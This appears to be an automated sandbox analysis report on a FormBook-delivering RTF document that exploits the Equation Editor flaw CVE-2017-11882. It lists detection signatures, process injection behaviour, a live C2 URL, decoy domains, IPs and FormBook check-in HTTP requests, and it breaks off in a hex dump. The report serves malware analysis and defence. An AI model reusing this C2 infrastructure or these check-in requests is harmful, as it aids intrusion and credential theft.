Windows Analysis Report
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912 (renamed file extension from 19912 to rtf)
Analysis ID: 680528
MD5: 8bfea104ae681494896379e3c647f6ae
SHA1: aaf97d8a987c5060ff06c4031030000d53d3cb31
SHA256: 2975edb12c8e70b56a89c7fb82e4eb347b992b4147dcfa2a20efd16d54c33eb4
Tags: rtf

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Document contains OLE streams which likely are hidden ActiveX objects
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Document contains OLE streams with names of living off the land binaries
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Uses ipconfig to lookup or modify the Windows network settings
PE file contains section with special chars
Sample uses process hollowing technique
Office process drops PE file
Writes to foreign memory regions
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality for execution timing, often used to detect debuggers
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Office Equation Editor has been started
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: www.lundadonate.xyz/nb30/ Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf Virustotal: Detection: 43%
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf ReversingLabs: Detection: 21%
Source: Yara match File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\Client.exe ReversingLabs: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\Client.exe Joe Sandbox ML: detected
Source: 9.0.notepad.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.notepad.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lundadonate.xyz/nb30/"], "decoy": ["p5w.top", "5tfg.com", "anicehost.net", "willsmalaysia.com", "yothisnox.com", "arripro.com", "etherhacker.net", "best-boy.net", "ppcrecruits.net", "sportsplaymaker.app", "indovanilla.net", "srsimmons.co.uk", "ahulubicyclecompany.com", "4lifegeneration.com", "asiasbodyscrubs.com", "allianceocm.com", "gadstrackingtool.site", "nycityspaces.com", "wsdldc.com", "paradise-unlimited.com", "h-language.com", "socialautopost.com", "facebfree.com", "rccl.tech", "ottomakeup.store", "top-softwarereviews.com", "buy-refrigerators.site", "dhglassbottle.com", "justcallmet3.online", "ce-chen-photography.com", "premierdealznext.online", "jnfbhch.com", "3dherders.com", "mejoresmoviles.top", "401by.com", "ynnanjiu.com", "hgirejr.space", "therapeuticdetailing.com", "nowinnofeeteam.co.uk", "banhtrangmuoitayninh.com", "xrhealthinstitute.com", "theilluminati.online", "opimprovements.co.uk", "altoonahanggliding.com", "yellowcottagedoor.com", "11111111111112000.top", "arlowepeak.com", "topbettingoffers.online", "geekmortgages.com", "casasyterrenosjalisco.info", "predicadores.online", "yuntiwang.top", "shanhaiverse.net", "wonderslots-fun.online", "droxgiy.online", "thebluejaysnest.net", "shenlongdian.com", "wf825.com", "urlasuite.xyz", "abundant-life-coach.com", "asd811.xyz", "fc10086.com", "thegoldencamel.online", "pqkjl.com"]}

Exploits

Source: Static RTF information: Object: 1 Offset: 001DC2BCh
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe
Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr Stream path '_1721489049/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ipconfig.pdb source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ipconfig.pdbN source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: notepad.pdb source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000003.950924763.0000000000900000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1046378480.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.949038674.00000000002A0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1176285668.0000000002220000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000003.1044991591.0000000002090000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: notepad.pdbx source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: Client.exe.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\Client.exe
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic DNS query: name: www.thegoldencamel.online
Source: global traffic DNS query: name: www.best-boy.net
Source: C:\Windows\SysWOW64\notepad.exe Code function: 4x nop then pop ebx 9_2_00407B44
Source: C:\Windows\SysWOW64\notepad.exe Code function: 4x nop then pop ebx 9_2_00407B1C
Source: C:\Windows\SysWOW64\notepad.exe Code function: 4x nop then pop edi 9_2_0040E47A
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80

Networking

Source: C:\Windows\explorer.exe Domain query: www.best-boy.net
Source: C:\Windows\explorer.exe Network Connect: 104.167.67.175 80
Source: C:\Windows\explorer.exe Network Connect: 66.235.200.170 80
Source: C:\Windows\explorer.exe Domain query: www.thegoldencamel.online
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
Source: Malware configuration extractor URLs: www.lundadonate.xyz/nb30/
Source: global traffic HTTP traffic detected: GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1Host: www.thegoldencamel.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1Host: www.best-boy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View ASN Name: ESITEDUS ESITEDUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Client.exe, 00000006.00000002.951081960.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000000.973857047.0000000006450000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000A.00000000.979092097.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 0000000A.00000000.996446358.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011537608.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995286555.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996486805.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980535513.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerp
Source: explorer.exe, 0000000A.00000000.1004860034.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.988141924.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1007082449.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.991189675.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1032583619.0000000004385000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5E27A50A-FBC0-4F18-B35D-48F0F2347081}.tmp
Source: unknown DNS traffic detected: queries for: www.thegoldencamel.online
Source: global traffic HTTP traffic detected: GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1Host: www.thegoldencamel.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1Host: www.best-boy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 16:39:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.thegoldencamel.online/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingX-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: MISSServer: cloudflareCF-RAY: 7379b09ee927997b-FRAData Raw: 31 36 61 33 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 
20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6
